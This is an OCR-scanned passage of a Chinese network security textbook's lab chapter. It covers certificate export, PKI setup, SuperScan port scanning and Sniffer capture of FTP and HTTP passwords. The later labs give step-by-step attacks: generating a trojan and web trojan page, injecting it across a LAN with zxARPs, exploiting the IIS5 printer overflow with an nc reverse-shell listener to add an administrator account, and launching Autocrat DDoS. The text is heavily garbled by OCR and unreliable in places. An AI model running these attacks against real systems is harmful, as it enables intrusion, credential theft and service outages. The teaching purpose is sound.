回 局 用 加 强 保护 (要求 IE 5.0，IT 4.0 SP4 或 更 高 版 本 ) 到) 
口 如 果 导 出 成 功 ， 山 除 密 钥 G) 


加 三 2 


图 12-20 “证 书 导出 向 导 ” 对 话 框 
步骤 五 ”设置 私 钥 保 护 密码 。 这 个 密码 将 会 在 导入 的 时 候 用 到 ,可 不 要 把 密码 忘记 了 。 
步骤 六 ”指定 导出 文件 的 存放 路 径 ， 单 击 “ 下 一 步 ”按钮 。 建 议 将 私 钥 备份 到 可 移动 
的 存储 设备 中 ， 如 软盘 或 光盘 等 。 
步骤 七 ” 单 击 “ 完 成 ”按钮 。 


说 明 : 恢复 你 的 证 书 (证 书 导 入 ) 和 证 书 导 出 的 操作 类 似 ， 按 照 向 导 提示 操作 即 可 将 证 书 导 
入 到 系统 中 。 


目前 支持 数字 签名 的 电子 邮件 软件 主要 有 Outlook 2000/XP、Outlook Express、 Foxmail、 
Notes、Netscape Messenger、Frontier、Pre-mail、Eudora 等 。 


(> 网 络 安全 管理 与 维护 


12.2 Win2000 PKI 应 用 实 训 


12.2.1 安装 证 书 服务 器 


一 、 实 训 目 的 
学 习 如 何 安装 Win2000 的 Certificate Services( 数 字 证 书 ) 及 如 何 配置 企业 根 证 书 。 
二 、 实 训 环 境 


- 台 预 装 Windows 2000 服务 器 版 的 计算 机 及 一 台 计 算 机 (可 以 是 XP 或 其 他 系统 )， 通 
过 网 络 相连 。 也 可 用 虚拟 机 组 建 实 训 环境 。 
三 、 实 训 内 容 和 步骤 
步骤 一 ”选择 “开始 ” |“ 设置 ” |“ 控 制 面板 ”命令 ， 在 弹出 的 “控制 面板 ”窗口 中 双 
击 “ 添 加 或 删除 程序 ”选项 ， 在 弹出 的 对 话 框 中 单 击 “ 添 加 /删除 Windows 组 件 ” 按 钮 ， 如 
图 12-21 所 示 。 


入 Livelpdate 1.6 Gymantec Corporation) 
Q Serverllagic 4.0 大 小 30. OMB 
现 5nort 大 小 B76KB 
CB Symantec pehnyrhere 大 小 42. BMB 


国 mare Tools 大 小 6. 15MB 

击 Yindows 2000 Support Tools 大 小 19. 1MB 

旭 Yintex 大 小 1. 69MB 
回 Yinpesp 3.0 大 小 3961B 
专 虱 WinRAR 压缩 文件 管理 器 大 小 2. 69MB 
2 加 
关闭 @) 
材 
计 图 12-21 “添加 /删除 程序 ”对 话 框 
步骤 二 ”在 随后 弹出 的 对 话 框 中 选中 “证 书 服务 ”， 单 击 “ 下 一 步 ”按钮 后 ， 会 弹出 
加 -个 对 话 框 ， 单 击 “ 是 ”按钮 就 可 以 了 ， 如 图 12-22 所 示 。 


步骤 三 ”选择 CA 类 型 ， 这 里 我 们 选中 “企业 根 CA” 单 选 按钮 ， 如 图 12-23 所 示 ， 然 
后 单 击 “ 下 一 步 ” 按 钮 。 
步骤 四 “为 此 CA 取 一 个 公用 的 名 称 ， 如 图 12-24 所 示 。 


图 12-22 “Windows 组 件 向 导 ” 对 话 框 及 提示 信息 


图 12-24 “CA 标识 信息 ”设置 界面 
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步骤 五 ”设置 CA 存放 的 位 置 ， 一 般 保 持 默认 即 可 ， 单 击 “ 下 一 步 ”按钮 ， 如 图 12-25 
所 示 。 


Ervine | 


图 12-25 “数据 储存 位 置 ”设置 界面 


步骤 六 弹出 一 个 对 话 框 ,提示 为 了 完成 安装 ， 必 须 暂时 停止 TS 服务 ， 单 击 “ 确 定 ” 
按钮 即 可 ， 如 图 12-26 所 示 。 


数据 储存 位 置 
指定 储存 配置 数据 、 数 据 库 和 日 志 的 位 置 


Fa | 
vm | 


Microsoft 证 书 服务 


图 12-26 提示 信息 


步骤 七 ”显示 安装 进度 条 ， 如 图 12-27 所 示 。 

步骤 八 _ 安 装 完成 ， 单 击 “ 完 成 ”按钮 即 可 。 如 图 12-28 所 示 。 

步骤 九 ”选择 “开始 ”| “程序 ”| “管理 工具 ”| “证 书 颁 发 机 构 ” 命 令 ， 如 图 12-29 所 
示 ， 进 入 证 书 服务 控制 台 。 


CT 


正在 配置 组件 
安装 程序 正在 根 笑 您 的 请 求 ， 进 行 配 置 更 到 


图 12-27 “正在 配置 组 件 ” 设 置 界面 


[windows 组 件 向 导 


完成 “Windows 组 件 向 导 ” 
EE 悠 已 成 功 地 完成 了 “Findows 组 件 向 导 ”。 


请 单 击 “ 完 成 ”来 关闭 此 向 导 。 


图 12-29 选择 命令 
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步骤 十 “在 证 书 服务 控制 台 里 可 以 查看 已 颁发 的 证 书 、 失 效 的 证 书 、 挂 起 或 吊销 证 书 
的 状态 以 及 添加 证 书 模板 。 
12.2.2 ”安装 客户 端 证 书 

一 、 实 训 目 的 

学 习 如 何 申请 和 安装 一 个 客户 端 证 书 。 

二 、 实 训 环 境 

- 台 预 装 Windows 2000 服务 器 版 的 计算 机 及 一 台 计 算 机 (可 以 是 XP 或 其 他 系统 )， 通 
过 网 络 相连 。 也 可 用 虚拟 机 组 建 实 训 环境 。 

三 、 实 训 内 容 和 步骤 


步骤 一 ”用 Bob 这 个 帐号 在 一 个 客户 端 上 登录 ， 本 例 为 XP 系统 。 打 开 正 浏览 器 ， 
在 地 址 栏 中 输入 http:// 证 书 服务 器 的 瑟 地 址 /certsrv/。 这 里 证 书 服务 器 的 IP 地 址 为 
192.168.13.200。 弹 出 一 个 登录 对 话 框 , 输入 Bob 的 帐号 与 密码 后 ， 按 Enter 键 ， 如 图 12-30 


正在 连接 到 192. 168. 13. 200 


用 户 名 四 ): @ saninistrater bd 
密码 @): oe 
记 住 我 的 密码 @B) 
Ce ] 


12-30 ”登录 对 话 框 


步骤 二 ”选中 “申请 证 书 ” 单 选 按 钮 ， 如 图 12-31 所 示 。 

步骤 三 ”选中 “高 级 证 书 申请 ” 单 选 按钮 后 单 击 “ 创 建 并 向 此 CA 提交 一 个 申请 ” 按 
钮 ， 在 证 书 模板 里 选择 “用 户 ”， 其 余 的 保持 默认 值 即 可 ， 单 击 “ 提 交 ” 按 钮 ， 弹 出 一 个 
对 话 框 ， 单 击 “ 是 ”按钮 就 行 了 。 然 后 单 击 “ 安 装 此 证 书 ” 按 钮 ， 如 图 12-32 所 示 ， 开 始 
安装 证 书 。 

步骤 四 安装 过 程 中 会 弹出 一 个 对 话 框 ， 仍 然 单 击 “ 是 ”按钮 ， 提 示 证 书 安装 成 功 ， 
如 图 12-33 所 示 。 


堂 漂 芝 类 玫 ”车 泣 窑 借 月 外 对 漳 台 
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您 使 用 此 Web 站 点 为 您 的 Web 浏览 器 ， 电 子 邮件 客户 端 ， 或 其 它 安全 程序 申请 一 
个 证 书 。 一 旦 您 获得 一 个 证 书 ， 


您 将 能 够 安全 地 向 Web 上 的 其 他 人 标识 您 自己 ， 
为 电子 邮件 签名 ， 加 密 电 子 邮件 ， 以 及 其 它 ， 基 于 您 申请 的 证 书 类 型 。 


一 个 任务 : 
〇 检索 CA 证 书 或 证 书 吊销 列表 
加 申请 证 书 
〇 检查 挂 起 的 证 书 
元 步 > 
月] 人 Internet 


图 12-31 选中 “申请 证 书 ” 单 选 按钮 


Kicrosoft 证 


检索 CA 证 书 或 证 书 吊销 列表 


12-33 ”证 书 已 安装 
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12.3 ”端口 扫描 与 网 络 监听 实 训 


12.3.1 使 用 SuperScan 进行 端口 扫描 


一 、 实 训 目 的 


通过 练习 使 用 网 络 端口 扫描 器 ， 可 以 了 解 主机 开放 的 端口 和 服务 程序 ， 从 而 获取 系统 
的 有 用 信息 ， 发 现 网 络 系统 的 安全 漏洞 。 端 口 扫 描 既 是 系统 管理 员 常 用 的 安全 检查 手段 ， 
也 是 黑客 攻击 的 前 奏 。 本 实 训 将 在 Windows 环境 下 使 用 SuperScan 进行 网 络 端口 扫描 ， 增 
强 学 生 对 网 络 的 安全 防护 知识 。 


二 、 实 训 环境 

两 台 预 装 Windows 2000/XP 的 计算 机 ， 通 过 网 络 相连 。 也 可 用 虚拟 机 组 建 实 训 环境 。 
三 、 实 训 内 容 和 步骤 

SuperScan 具有 端口 扫描 、 主 机 名 解析 、Ping 扫描 功能 ， 其 界面 如 图 12-34 所 示 。 
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图 12-34 SuperScan 的 操作 界面 


步骤 一 ”使 用 SuperScan 进行 主机 名 解析 。 


在 


Hostname Lookup 栏 中 ， 可 以 输入 人 P 地 址 或 需要 转换 的 域名 ， 单 击 Lookup 按钮 就 


可 获得 转换 后 的 结果 ; 单 击 Me 按钮 可 获得 本 机 的 人 P 地 址 ; 单 击 Interfaces 按钮 可 获得 本 
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地 计算 机 他 地址 的 详细 设置 。 

步骤 二 ”使 用 SuperScan 进行 端口 扫描 。 

利用 端口 扫描 功能 ， 可 以 扫描 目标 主机 开放 的 端口 和 服务 。 在 卫 选项 组 的 Start 微调 
框 中 输入 开始 的 下 地 址 , 在 Stop 微调 框 中 输入 结束 的 他 地 址 , 在 Scan type 选项 组 中 选中 
All list ports from 1 to 65535 单 选 按钮 ， 这 里 规定 了 扫描 的 端口 范围 ， 然 后 单 击 Scan 选项 组 
中 的 Start 按钮 ， 就 可 以 在 选择 的 IP 地 址 段 内 扫描 不 同 主机 开放 的 端口 了 。 扫 描 完 成 后 ， 
选中 扫描 到 的 主机 的 人 P 地 址 ， 单 击 Expand all 按钮 会 展开 每 台 主 机 详细 的 扫描 结果 。 图 
12-35 是 对 主机 192.168.0.1 的 扫描 结果 。 扫 描 窗 口 右 侧 的 Active hosts 和 Open ports 将 分 别 
显示 发 现 的 活动 主机 和 开放 的 端口 数量 。 


二 SuperScan 3.00 


Timeout 
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12-35 ”端口 扫描 结果 


SuperScan 也 提供 特定 端口 扫描 功能 ,在 Scan type 选项 组 中 选中 All selected ports in list 
单 选 按钮 ， 就 可 以 按照 选 定 的 端口 扫描 。 单 击 Configuration 选项 组 中 的 Port list setup 按钮 
就 可 以 进入 端口 配置 菜单 ， 如 图 12-36 所 示 。 选 中 Select ports 选项 组 中 的 某 一 个 端口 ， 在 
左上 角 的 Change/add/delete port info 选项 组 中 会 出 现 这 个 端口 的 信息 ,选中 Selected 复 选 框 ， 
然后 单 击 Apply 按钮 就 可 以 将 此 端口 添加 到 扫描 的 端口 列表 中 。Add 和 Delete 按钮 可 以 添 
加 或 删除 相应 的 端口 。 然 后 单 击 Port list file 选项 组 中 的 Save 按钮 ， 会 将 选 定 的 端口 列表 
保存 为 一 个 lst 文件 。 默 认 情况 下 ，SuperScan 有 scanner.lst 文件 ， 包 含 了 常用 的 端口 列表 ， 
还 有 一 个 trojans.lst 文件 ， 包 含 了 常见 的 木马 端口 列表 。 通 过 端口 配置 功能 ，SuperScan 提 
供 了 对 特定 端口 的 扫描 ， 节 省 了 时 间 和 资源 ， 通 过 对 木马 端口 的 扫描 ， 可 以 检测 目标 主机 
是 否 被 种 植木 马 。 
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二 SuperScan 3.00 
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12-36 ”端口 配置 界面 
步骤 三 ”Ping 功能 
SuperScan 的 Ping 功能 提供 了 检测 在 线 主机 和 判断 网 络 状况 的 作用 。 通 过 在 IP 选项 组 
中 输入 起 始 和 结束 瑟 地 址 ， 选 中 Scan type 选项 组 中 的 Ping only 单 选 按钮 ， 即 可 单 击 Start 
按钮 启动 Ping 扫描 。 在 他 选项 组 ，Ignore IP zero 和 Ignore IP 255 选项 分 别 用 于 屏蔽 所 有 
以 0 和 255 结束 的 他 地址 ，PrevC 和 NextC 按钮 可 直接 转换 到 前 一 个 或 后 一 个 C 类 到 网 
段 。1...254 按钮 则 用 于 直接 选择 整个 网 段 。 在 Timeout 选项 组 中 可 根据 需要 选择 不 同 的 时 间 。 


12.3.2 ”使 用 Sniffer 工具 进行 网 络 监听 


一 、 实 训 目 的 


通过 使 用 Sniffer Pro 软件 掌握 Sniffer( 嗅 探 器 ) 工 具 的 使 用 方法 ， 实 现 捕捉 FTP、HTTP 
等 协议 的 数据 包 , 以 理解 TCP/IP 协议 中 多 种 协议 的 数据 结构 、 会 话 连接 建立 和 终止 的 过 程 、 
TCP 序列 号 、 应 答 序列 号 的 变化 规律 。 并 且 ， 通 过 实 训 了 解 FTP、HTTP 等 协议 明文 传输 
的 特性 ， 以 建立 安全 意识 ， 防 止 FTP、HTTP 等 协议 由 于 传输 明文 密码 造成 的 泄密 。 


二 、 实 训 环境 


两 台 安 装 有 Windows 2000/XP 的 计算 机 ， 其 中 一 台 安 装 Sniffer Pro 软件 ， 计 算 机 间 通 
过 Hub 相连 ， 组 成 局 域 网 。 也 可 用 虚拟 机 组 建 实 训 环境 。 


三 、 实 训 内 容 和 步骤 
1. Sniffer Pro 工具 的 使 用 
步骤 一 ”启动 Sniffer Pro 软件 后 可 看 到 它 的 主 界面 , 启动 时 有 时 需要 选择 相应 的 网 卡 ， 
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选 好 后 即 可 启动 软件 。 

步骤 二 ”捕获 数据 包 前 的 准备 工作 。 

在 默认 情况 下 ，Sniffer 将 捕获 其 接 入 碰撞 域 中 流 经 的 所 有 数据 包 ， 但 在 某 些 场景 下 ， 
有 些 数据 包 可 能 不 是 我 们 所 需要 的 ， 为 了 快速 定位 网 络 问题 的 所 在 ， 有 必要 对 所 要 捕获 的 
数据 包 作 过 滤 。Sniffer 提供 了 捕获 数据 包 前 的 过 滤 规则 的 定义 ， 过 滤 规 则 包括 2、3 层 地 址 
的 定义 和 几 百 种 协议 的 定义 。 定 义 过 滤 规 则 的 做 法 一 般 如 下 。 

(1) 在 主 界面 选择 Capture | Define Filter 命令 ， 打 开 Define Filter 对 话 框 。 

(2) 切换 到 Address 选项 卡 ， 这 里 是 最 常用 的 定义 。 其 中 包括 MAC 地 址 、IP 地 址 和 
IPX 地 址 的 定义 。 以 定义 他 地 址 过 滤 为 例 ， 如 图 12-37 所 示 。 


图 12-37 过 滤器 地 址 过 滤 设 置 界面 


比如 ， 现 在 要 捕获 地 址 为 10.1.30.100 的 主机 与 其 他 主机 通信 的 信息 ， 在 Mode 选项 组 
中 ,选中 Include 单 选 按钮 (选中 Exclude 单 选 按钮 ， 是 表示 捕获 除 此 地 址 外 所 有 的 数据 包 )， 
在 Station 1 选项 组 中 ,在 任意 一 栏 中 填 上 10.1.30.100， 另 外 一 栏 中 填 上 Any(Any 表示 所 有 
的 下 地 址 )。 这 样 就 完成 了 地 址 的 定义 。 注 意 到 Dir. 栏 的 图 标 : 如 到 表示 ， 捕获 Station1 
收发 的 数据 包 ; 最 后 ， 单 击 Profiles 按钮 将 定义 的 规则 保存 下 来 ， 供 以 后 使 用 。 

(3) 在 Define Filter 对 话 框 中 切换 到 Advanced 选项 不， 定义 希望 捕获 的 相关 协议 的 数 
据 包 ， 如 图 12-38 所 示 。 

比如 ， 如 果 想 捕获 FTP、NETBIOS、DNS、HTTP 的 数据 包 ， 那 么 要 首先 打开 TCP 选 
项 界面 ， 再 进一步 选 协议 ， 还 要 明确 DNS、NETBIOS 的 数据 包 有 些 是 属于 UDP 协议 ， 故 
需 在 UDP 选项 界面 中 做 类 似 于 TCP 选项 界面 的 工作 ， 和 否则 捕获 的 数据 包 将 不 全 。 如 果 不 
选择 任何 协议 ， 则 捕获 所 有 协议 的 数据 包 。Packet Size 选项 组 中 ， 可 以 定义 捕获 的 包 的 大 
小 ， 图 12-39 是 定义 捕获 包 大 小 界 于 64 一 128b/s 的 数据 包 。 

(4) 在 Define Filter 对 话 框 中 切换 到 Buffer 选项 卡 ， 定 义 捕 获 数据 包 的 缓冲 区 ， 如 
图 12-40 所 示 。 

Buffer size 选项 组 ， 将 其 设 为 最 大 40M。Capture buffer 选项 组 ， 将 设置 缓冲 区 文件 存 
放 的 位 置 。 


@ 
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(5) 最 后 ， 需 将 定义 的 过 滤 规 则 应 用 于 捕获 中 ， 如 图 12-41 所 示 。 
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图 12-40 ”捕获 数据 包 缓冲 区 大 小 设置 界面 


Advaneed 
‘Protocol: DNS (TCP), FITP, HITP, NETBIOSC 
一 64《 Packet size < 1800 


日 Baffer 
Buffer size: 40 Meg Byte 
一 Buffer action: rap 


图 12-41 捕获 规则 应 用 界面 
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在 Select a filter for capture 列表 框 中 选取 定义 的 捕获 规则 。 

步骤 三 ”捕获 数据 包 时 观察 到 的 信息 。 

选择 Capture | Start 命令 ， 启 动 捕获 引擎 。Sniffer 可 以 实时 监控 主机 、 协 议 、 应 用 程序 、 
不 同 包 类 型 等 的 分 布 情况 ， 如 图 12-42 所 示 。 


File | Monitor Capture Display Iools Datsbase Window Help 
a Dashboard 

host Table 

Natrix 

Mpplication Response Time 

Mistory Sanples 

Protocol Jistribation 

Global Statisties 

Smart Screens 

Physicel Leyer Stets 


Sonet Statistics 
Seiteh 

Define Filter... 
Select Filter... 


如 arm Log 
Confi pure Netriy SHE 


12-42 Sniffer 的 监控 选项 界面 


Dashboard: 可 以 实时 统计 每 秒 钟 接收 到 的 包 的 数量 、 出 错 包 的 数量 、 丢 弃 包 的 数量 、 
广播 包 的 数量 、 多 播 包 的 数量 以 及 带宽 的 利用 率 等 。Host Table: 可 以 查看 通信 量 最 大 的 前 
10 位 主机 。Matrix: 通过 连 线 , 可 以 形象 地 看 到 不 同 主机 之 间 的 通信 。Application Response 
Time: 可 以 了 解 到 不 同 主机 通信 的 最 小 、 最 大 、 平均 响应 时 间 方 面 的 信息 。History Samples: 
可 以 看 到 历史 数据 抽样 出 来 的 统计 值 。Protocol Distribution: 可 以 实时 观察 到 数据 流 中 不 同 
协议 的 分 布 情况 。Switch: 可 以 获取 cisco 交换 机 的 状态 信息 。 在 捕获 过 程 中 ， 同 样 可 以 对 
想 观察 的 信息 定义 过 滤 规 则 ， 操 作 方 式 类 似 捕获 前 的 过 滤 规 则 。 

步骤 四 “捕获 数据 包 后 的 分 析 工 作 。 

要 停止 Sniffer 捕获 包 时 ， 选 择 Capture | Stop 命令 或 者 Capture | Stop and Display 命令 ， 
前 者 停止 捕获 包 ， 后 者 也 停止 捕获 包 并 把 捕获 的 数据 包 进 行 解码 和 显示 ， 如 图 12-43 所 示 。 


Eile [Monitor Captare Display Tools Dat 
Dashbesrd 
Host Table PR 
Matrix 

Application Response Time 
Mistory Samples 

Protocol Distribation 
Global Statistics 

nmrt sorsenn 

Phyrio Lover StE 
Sonvl Sixtistics 

Suiteh 
Doefine Filter 
Select Pilter. 


Anrm Lo 
DonEi pore Netrix Sniteh 


12-43 ”停止 捕获 数据 包 


(CO 网络 雪人 管理 与 维护 


潼 洲 车 粮 壮 ” 寺 潍 式 谷村 册 台 招 卫 


Sniffer 的 两 种 使 用 模式 说 明 如 下 。 

Decode: 对 每 个 数据 包 进 行 解码 , 可 以 看 到 整个 包 的 结构 及 从 链 路 层 到 应 用 层 的 信息 ， 
事实 上 ，Sniffer 的 使 用 中 大 部 分 的 时 间 都 花费 在 这 上 面 的 分 析 上 ， 同 时 也 对 使 用 者 在 网 络 
的 理论 及 实践 经 验 上 提出 了 较 高 的 要 求 。 素 质 较 高 的 使 用 者 借 此 工具 便 可 看 穿 网 络 问题 的 
症结 所 在 。 

Expert: 这 是 Sniffer 提供 的 专家 模式 ， 系 统 自身 根据 捕获 的 数据 包 从 链 路 层 到 应 用 层 
进行 分 类 并 作出 诊断 .其 中 Diagnoses 提出 了 非常 有 价值 的 诊断 信息 。 图 12-44 所 示 是 Sniffer 
检测 到 地址 重 开 的 例子 及 相关 的 解析 。 

(EEzpert -lal 


|_ Layer |?| [lrirstTine [Dwration [Description 
全 | 
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Diagnoses 


Symptoms 


图 12-44 专家 分 析 界 面 

Sniffer 同样 提供 解码 后 的 数据 包 过 滤 显示 。 要 对 包 进 行 显示 过 滤 需 切换 到 Decode 模 
式 。Displayadefinefilter 用 于 定义 过 滤 规 则 的 显示 。Displayaselectfilter 则 用 于 应 用 过 滤 规 则 
的 显示 。 显 示 过 滤 的 使 用 方法 基本 上 跟 捕 获 过 滤 的 使 用 方法 相同 。 

步骤 五 Sniffer 提供 的 工具 应 用 。 

Sniffer 除了 提供 数据 包 的 捕获 、 解 码 及 诊断 外 ， 还 提供 了 一 系列 的 工具 ， 包 括 包 发 生 
器 、ping、traceroute、DNSlookup 、finger、whois 等 工具 。 其 中 , 包 发 生 器 比较 有 特色 ， 下 
面 将 作 简单 介绍 。 其 他 工具 在 操作 系统 中 也 有 提供 ， 这 里 不 作 介绍 。 

包 发 生 器 提供 3 种 生成 数据 包 的 方式 ， 具 体 如 下 所 示 。 

单 击 叭 ， 新 构 一 个 数据 包 ， 包 头 、 包 内 容 及 包 长 由 用 户 直接 填写 。 图 12-45 所 示 定 义 

-个 广播 包 ， 使 其 连续 发 送 ， 包 的 发 送 延迟 位 为 Ims。 

单 击 坚 , 发 送 在 Decode 模式 中 所 定位 的 数据 包 , 同时 可 以 在 此 包 的 基础 上 对 数据 包 进 
行 如 前 述 的 修改 。 

单 击 转 ， 发 送 buffer 中 所 有 的 数据 包 ， 实 现 数据 流 的 重 放 ， 如 图 12-46 所 示 。 


: ££ ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 
: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 o0 00 
: 00 00 00 00 00 00 00 00 00 00 00 00 


图 12-46 设置 数据 包 重 放 次 数 


可 以 定义 连续 地 发 送 buffer 中 的 数据 包 或 只 发 送 一 次 buffer 中 的 数据 包 。 请 特别 注意 ， 
不 要 在 运行 的 网 络 中 重 放 数据 包 ， 否 则 容易 引起 严重 的 网 络 问题 。 数 据 包 的 重 放 经 常用 于 
实 训 环境 中 。 


2. 捕获 FTP 数据 包 并 进行 分 析 


步骤 一 ”如 前 面 所 示 ， 设 置 好 捕获 条 件 ， 选 择 Capture | Define Filter | Advanced 命令 ， 
在 打开 的 对 话 框 中 选中 IP| TCP | FTP。 

步骤 二 ” 单 击 捕捉 键 ,注意 打开 工具 栏 中 的 Capture Panel 按钮 , 可 显示 出 捕捉 的 Packet 
数量 。 

步骤 三 在 B 主机 上 开始 登录 一 个 FTP 服务 器 , 接着 打开 FTP 的 某 个 目录 , 此 时 ， 从 
Capture Panel 中 看 到 捕获 的 包 已 达到 一 定 的 数量 ， 此 时 可 停止 抓 包 。 

步骤 四 ” 单 击 窗口 左下 角 的 Decode 选项 ， 会 显示 捕 提 的 数据 包 并 进行 分 析 。 

步骤 五 ”在 捕获 包 中 ,我 们 可 以 发 现 大 量 有 用 的 信息 ， 如 用 户 名 、 登 录 密 码 、 包 类 型 、 
结构 等 。 


图 
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3. 捕获 HTTP 数据 包 并 进行 分 析 


步骤 一 ”如 前 面 所 示 ， 设 置 好 捕获 条 件 ， 选 择 Capture | Define Filter | Advanced 命令 ， 
在 打开 的 对 话 框 中 选中 IP|TCP | HTTP。 

步骤 二 ”步骤 同 前 。 

步骤 三 B 主机 登录 一 个 Web 服务 器 ， 并 输入 自己 邮箱 的 地 址 和 密码 。 

步骤 四 “步骤 同 前 。 

步骤 五 ”同样 ， 可 在 捕获 包 中 得 到 大 量 的 重要 信息 。 


12.4 ARP 欺骗 攻击 实 训 


一 、 实 训 目 的 
通过 局 域 网 内 网 页 方式 挂 马 的 练习 ， 更 好 地 理解 ARP 攻击 的 原理 和 使 用 。 
二 、 实 训 环境 


计算 机 上 安装 HS 组 件 (或 Baby Web Server 软件 ) 用 来 配置 Web 服务 器 ,“ 黑 洞 ” 木 马 ， 
ms07027 网 马 生 成 器 ，zxARPs，WinPcap; 配置 计算 机 的 他 地 址 为 192.168.3.200， 局 域 网 
内 的 耳 段 为 192.168.3.0。 


三 、 实 训 内 容 和 步骤 


步骤 一 ”配置 木马 服务 端 。 

运行 “黑洞 ”木马 的 Client.exe 文件 ， 进 入 Client.exe 的 主 界面 后 ， 选 择 “文件 ”|“ 生 
成 安装 版 本 服务 端 程序 ”命令 。 

进入 服务 端 程序 的 创建 界面 后 ， 然 后 切换 到 “连接 选项 ”选项 卡 ， 在 “主机 ”文本 框 
中 填 入 本 机 的 公 网 卫 地 址 ，“ 端 口 ” 可 以 保持 默认 的 “2006”。 最 后 在 “输入 连接 密码 ” 
文本 框 中 填 入 用 来 连接 对 方 的 密码 ， 如 图 12-47 所 示 。 设 置 完 成 后 单 击 “ 生 成 ”按钮 ， 选 
择 木 马 服务 端的 保存 路 径 ， 如 ci\setup.exe。 

步骤 二 ”架设 Web 服务 器 。 

配置 TS， 架设 Web 服务 器 ， 主 目录 设置 为 C\， 默 认 主 页 设置 为 hacker315.htm (即将 
生成 的 网 马 )。 

步骤 三 ”生成 网 页 木马 。 

运行 “MS07027 网 马 生成 器 ”， 在 “网 马 地 址 ”文本 框 中 输入 木马 所 在 路 径 : 
http://192.168.3.200/setup.exe， 单 击 “ 生 成 网 马 ” 按 钮 即 可 生成 网 马 hacker315.htm。 

步 又 四 ”局域网 挂 马 。 

安装 WinPcap 软件 ,将 zxARPs.exe 复制 到 C:\ 下 , 打开 “命令 提示 符 ” 窗 口 , 进入 C\， 
执行 如 下 命令 : zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert， 挂 马 成 功 。 

当局 域 网 内 具有 MS07027 漏洞 的 计算 机 在 连接 任何 网 站 时 都 会 运行 木马 程序 , 从 而 成 
为 “肉鸡 ”。 
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12-47 ”连接 选项 
12.5 缓冲 区 溢出 攻击 实 训 


一 、 实 训 目 的 
通过 IIS 的 pinter 缓冲 区 溢出 攻击 的 实例 ， 理 解 缓冲 区 攻击 的 原理 和 攻击 方法 。 


二 、 实 训 环境 
实 训 中 用 到 的 软件 有 IIS5Exploit.exe、NC.exe， 被 攻击 的 主机 安装 英文 版 IS 5.0。 


三 、 实 训 内 容 和 步骤 
步骤 一 ”开放 监听 端口 。 
在 命令 提示 符 下 运行 nc -1-p 5555， 其 中 5555 为 监听 端口 ， 可 以 自己 设 定 。 

步骤 二 ”使 用 IIS5Exploit 进行 攻击 。 

新 开 一 个 “命令 提示 符 ” 窗 口 ， 运 行 IIS5Exploit 192.168.3.10 192.168.3.200 5555， 划 
中 192.168.3.10 为 要 攻击 的 目标 主机 的 人 P 地 址 ，192.168.3.200 为 本 机 的 他 地址 ，5555 为 
监听 端口 ， 与 步骤 一 中 开放 的 监听 端口 一 致 。 

执行 成 功 后 在 监听 窗口 中 会 出 现 如 图 12-48 所 示 的 信息 。 

在 监听 窗口 中 输入 net user hack password /add 按 Enter 键 后 再 输入 net localgroup 
administrartors hack /add， 这 样 就 在 目标 计算 机 上 创建 了 一 个 属于 Administrators 组 的 用 户 
hack， 密 码 为 password。 
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Hicrosoft Windows 2888[Version 5.88.2195] 
《C) Copyright 1985-1999 Microsoft Corp. 


图 12-48 IIS5Exploit 执行 成 功 后 


12.6 ”拒绝 服务 攻击 实 训 


一 、 实 训 目 的 

通过 拒绝 服务 攻击 的 实例 ， 理 解 拒绝 服务 攻击 的 原理 和 攻击 方法 。 

二 、 实 训 环境 

实 训 中 用 到 的 软件 Autocrat， 被 攻击 的 计算 机 上 安装 Autocrat 软件 的 服务 器 端 程序 。 
三 、 实 训 内 容 和 步骤 


步骤 一 


添加 主机 。 


打开 Autocrat 软件 的 客户 端 ， 单 击 “ 添 加 ”按钮 ， 输 入 对 方 的 耳 即 可 。 


步骤 二 


发 动 攻 


检查 Server 状态 。 


生前 ， 为 保证 Server 有 效 ， 对 它 进行 一 次 握手 应 答 过 程 ， 把 没 用 的 Server 踢 出 


去 ， 单 击 “ 检 查 状 态 ”按钮 ，Client 会 对 IP 列表 进行 一 次 扫描 检查 ， 最 后 会 生成 一 个 报告 ， 
如 图 12-49 所 示 。 


步骤 三 
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12-49 检查 Server 端 状态 
清理 无 效 主机 。 


单 击 “切换 ”按钮 进入 无 效 主机 列表 ， 单 击 “ 清 理 主机 ”按钮 把 无 效 的 废 机 踢 出 去 ， 


| 
到 主机 列表 ， 如 图 12-50 所 示 。 


明 Autocrat DDoS Client eu 
tl FW、 风量 天 、the0erat、 笑 天 于 无 心 ee 
[mn | | 
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党 12 曹 区 厅 太 能 曙 经 


再 单 击 一 次 “切换 ”按钮 转 


FI 


控制 所 有 主机 ， 加 果 寺 要 单 儿 控制 ， 请 用 手工 命令 或 http: 1 8535 


检查 状态 | 检查 文件 | 信使 服务 开始 攻击 |， 停止 攻击 | | 
信和 使 服务 
im :|| 于 res 


利用 车 5 
| Poe 97_ 135, 108 ~ Autocrat MDS Server reedy Logimashiori 
202. 97.144. 123 连接 失 财 


12-50 ”清理 无 效 主机 
步骤 四 “检查 文件 。 


攻击 时 要 用 到 wsock32s/lp.dll 这 3 个 DLL 文件 , 单 击 “ 检 查 文件 ”按钮 查看 文件 状态 ， 
如 果 发 现 文件 没 了 ， 可 以 用 extract 命令 释放 文件 ， 如 图 12-51 所 示 。 


主机 刘表 
| 共有 6 台 主机 [添加 入 聊 


0 

| 202. 67 
202 3 
202 
202 
202. .106 


控制 所 有 主机 ， 如果 需要 单 狐 控制 ， 请 用 手工 命令 或 http://ip:6535 | 
检查 状态 。 检查 文件 | 


信 合 服务 | | 开 好 攻击 | | 停 上 攻击 | | 
[了 


| len2 97. 135. 106 连接 成 功 正在 检查 文 伞 
lz02. 97,135.106 - 文件 信 | 
EN Syst ee vvrecGe a 
CE: FTOT\Systen32\wsock321. dll 
:VEDQT\System32zVwseci32p dll 


|202. 96. 86. 56 - 文件 信息 : 

-VEDNT\Syste32Vwsoclacs dll 
:VEDNT\Systes32Vwsocl321 dll 
| EECDRTVSystemsevwseckGcp dll 


12-51 检查 文件 
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步骤 五 攻击 
经 过 前 面 的 准备 ， 可 以 发 动 攻击 了 ， 如 图 12-52 所 示 。 


独裁 者 Powered by (C)2002 HBUO 梦 勾 小 组 


明 Autocrat DDoS Client “He.u 


He: Bui Umon 
JU 小 组 FH、 风量 天 、the0crat、 笑 天 末 无 必 协力 制作 了 -BAIL- cjc00Tecauninet. com 


命令 控制 台 一 一 一 
控制 所 有 主机 ,如 果 需 要 单独 控制 ,请 用 手工 命令 或 http://ip:8535 


